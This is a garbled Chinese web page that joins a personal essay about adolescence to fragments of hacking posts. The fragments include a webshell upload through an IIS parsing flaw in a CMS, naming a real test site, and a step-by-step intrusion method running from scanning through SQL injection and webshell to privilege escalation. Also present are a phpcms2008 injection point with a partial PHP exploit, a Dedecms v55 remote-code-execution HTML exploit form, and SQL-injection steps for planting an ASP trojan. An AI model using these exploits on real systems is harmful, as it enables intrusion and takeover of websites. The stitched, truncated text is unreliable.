年幼无知幼小的心灵就开始知道去喜欢异性，欣赏自己认为美的异性了，漂亮的脸蛋儿，还是甜美的笑容，还是严肃紧绷的脸庞，还是坏坏的我行我素。。。还记得初中毕业时同学录里德留言嘛？清一色的别处淘换，什么你是大海什么什什么，你是一朵清秀的莲花，什么什么，不管我们怎么样我们都要怎样怎样。。。可我连同学录都没买。就这样，他们踏上了他们的路程。
懵懂惹了不少祸端，招了不少麻烦，挨了不少顿揍， 揍过不少人。值了。

测试站点:http://www.scdxart.com
作者：'Linxi
QQ 75294885
搜集到一些基本信息。发现为风讯cms5.0搭建的

 匆忙之间写的。 我就不上图了。 大家自己去测试。

在Kppw后台  有个模版标签的地方。

选择后有个新建标签。 可以利用IIS解析漏洞写马进去。 比如1.php;.  因为结尾是.html  不可修改的。 只能修改文件名字。 所以利用解析漏洞可以直接添加PHP文件. ASP. .NET==.

. 自己动手测试吧..

漏洞已经上报官方。。   已经修补。    2.2以后版本就已经不存在了。

一流黑客入侵大型网站的完整思路剖析入侵方法及思路:

1.X-SCAN扫描目标服务器(一般是没有漏洞,收集信息用吧),看看IIS写权限有漏洞吗,用53溢出或者其他0day和溢出工具试试==>手工查看主站漏洞,先用google+阿d批量扫注入,再手工测试漏洞(例如注入,上传,爆库等等),同时用AC4扫(它在注入方面很细致)==获得 WEBSHELL==提权获得3389 (也许有时候把第3条放在第一条前,更合理一些,直接嗅探方便些)。

2.用http://www.seologs.comip-domains.html将主站列同服务器

文档分类:脚本攻防/web apps
发表时间：2010-5-10 16:39:50
漏洞添加：sitedir
阅读关键字：phpcms2008 sp3 0day

phpcms2008 sp3通杀0day放出
注射漏洞所在处：
yp/company.php?where=%23

EXP如下：

<?php
ini_set("max_execution_time",0);
error_reporting(7);

function usage()
{
     global $argv;
     exit(
        

http://www.hexsafe.com/

将以下代码直接复制保存为html文件，更改对应URL为目标网址即可利用：

<HTML><HEAD><TITLE>Dedecms v55 RCE Exploit Codz By J</TITLE></HEAD>
<BODY style="FONT-SIZE: 9pt">---------- Dedecms v55 RCE Exploit Codz By J
---------- <br><br>
<form action=http://www.xxx.com/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-dat

四、发现WEB虚拟目录
只有找到WEB虚拟目录，才能确定放置ASP木马的位置，进而得到USER权限。有两种方法比较有效。
一是根据经验猜解，一般来说，WEB虚拟目录是：c:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot等，而可执行虚拟目录是：c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。
二是遍历系统的目录结构，分析结果并发现WEB虚拟目录；
先创建一个临时表：temp
HTTP://xxx.xxx.xxx/abc.asp?p=YY;creat